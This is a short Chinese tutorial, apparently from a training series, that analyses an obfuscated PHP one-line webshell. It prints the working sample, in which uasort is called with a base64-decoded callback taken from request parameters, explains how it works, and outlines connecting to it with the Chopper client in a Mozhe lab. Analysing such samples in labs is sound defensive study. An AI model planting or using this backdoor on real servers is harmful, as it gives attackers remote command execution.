WebShell代码分析溯源(八)

WebShell代码分析溯源(八)

一、一句话变形马样本

<?php $e=$_REQUEST['e'];$arr= array('test', $_REQUEST['POST']);uasort($arr, base64_decode($e));?>

二、代码分析

1、调整代码格式

　　

2、分析代码

首先使用REQUEST方法接收url中e参数传递的值,然后创建arr数组并赋值,然后使用uasort排序函数，base64_decode($e)进行解密之后的自定义函数对arr数组进行排序，构造成一句话木马base64_decode($_REQUEST['e'])$_REQUEST['POST']。

注:uasort() 函数使用用户自定义的比较函数对数组排序，并保持索引关联（不为元素分配新的键）

参考:https://www.w3school.com.cn/php/func_array_uasort.asp

三、漏洞环境搭建

1、这里使用在线学习平台墨者学院中的实验环境(WebShell代码分析溯源(第7题))，地址: https://www.mozhe.cn/bug/detail/VDI4bUFTbVpveGJJakdwMHd1OCtzZz09bW96aGUmozhe

2、代码环境，下载代码

　　

3、分析(上面已经分析过了)

4、使用菜刀连接

　　

5、执行一些命令